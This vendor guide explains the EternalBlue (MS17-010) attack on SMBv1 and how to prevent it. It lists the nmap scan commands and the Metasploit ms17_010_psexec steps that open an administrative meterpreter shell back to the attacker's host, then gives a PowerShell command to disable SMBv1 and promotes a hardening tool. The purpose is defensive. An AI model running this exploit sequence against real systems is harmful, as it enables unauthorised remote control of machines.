SMBv1 is insecure – this has been known since 2014. Despite this, the Eternal Blue Exploit is still hitting some company networks. We show you how you can prevent attackers from using this ‘popular’ vulnerability as a gateway.
Why is SMBv1 so dangerous?
The Server Message Block Protocol version 1 (SMBv1 for short) is considered obsolete, but it is still running on many systems. Attackers therefore like to exploit this vulnerability. With the infamous Eternal Blue Exploit, referred to by Microsoft as MS17-010, hackers can gain unauthorised access to systems – which was achieved worldwide with the WannaCry and NotPetya cyberattacks, among others.
In this guide, you will learn how an attacker exploits the SMBv1 vulnerability to penetrate systems. We also offer you a simple solution against the Eternal Blue Exploit.
We have also summarised our explanations in this video:
This is how an Eternal Blue attack works
Let’s imagine the following scenario: An attacker has access to a corporate network, but no other rights. His goal is to open a remote shell with administrative rights on an unhardened domain controller (IP 10.10.99.10).
He uses Kali Linux (IP 10.10.99.7) for his project. The operating system, which is intended for security experts, can also be ‘abused’ by black hat hackers.
The attack, in which the SMBv1 gap is exploited via Kali Linux, is divided into these phases:
Phase 1: Analysis of the target system
The attacker starts an analysis with the ‘nmap’ tool, which is used to analyse networks and ports. This prompt is sufficient for this:
nmap -v -Pn -sV 10.10.99.10
The result ‘reveals’ open ports – including port 445, which is used for SMB. The active service ‘microsoft-ds’ indicates that SMB is available in a specific version.
The attacker now searches specifically for known vulnerabilities with the following input:
nmap -v -Pn -p 445 –script smb-vuln-ms17-010 10.10.99.10
The script reveals that the target system is vulnerable. This is a high risk factor.
Phase 2: Execution of the attack
In the next step, the attacker relies on Metasploit, a framework for penetration testers. He therefore types in the following in sequence:
msfconsole
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 10.10.99.10
set LHOST 10.10.99.7
run
A meterpreter shell opens. The hacker can use this to control the system remotely. By entering ‘whoami’, he realises that he has the highest rights on the system (‘nt authority\system’).
In other words, the attacker receives a remote shell with administrative rights. This is the ideal starting point for penetrating further, stealing information, encrypting data or paralysing entire networks.
What is the solution? System Hardening!
In order to nip attacks like the one just described in the bud, ‘hardening’ is required. To do this, disable SMBv1 and use more secure alternatives such as SMBv2 or SMBv3. You can do this with this PowerShell command:
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -Remove
A restart is then required to make the changes effective.
What are the benefits of System Hardening?
We run through the scenario again by proceeding in exactly the same way – but on a hardened system. This time, the results look like this:
✅ The scan provides no clear confirmation for the SMB service.
✅ The ‘nmap’ test for Eternal Blue vulnerabilities does not return any vulnerability.
✅ The attempt to execute the Metasploit exploit fails. No remote shell is opened.
Conclusion
The deactivation of SMBv1 successfully prevented the attack. The ‘cybergangster’ was no longer able to compromise the system and MS17-010 or the Eternal Blue Exploit is therefore ineffective. This shows impressively how important it is to deactivate individual, insecure services.
Please realise: The SMBv1 vulnerability is just one of many that should be eliminated preventively in IT systems. Every closed security gap reduces the attack surface – and therefore the risk of systems being compromised.
You therefore need to rely on a holistic security strategy in order to optimally protect your systems. This includes a comprehensive Secure Configuration or System Hardening. To make efficient progress, you should implement a professional hardening tool such as Enforce Administrator – especially if you have a large, heterogeneous IT landscape with hundreds or even thousands of systems.
How can we help you?
Would you like to know how you can professionally realise (automated) System Hardening and implement it in your company? Contact us – our experts will be happy to help you!
Image: Freepik Pikaso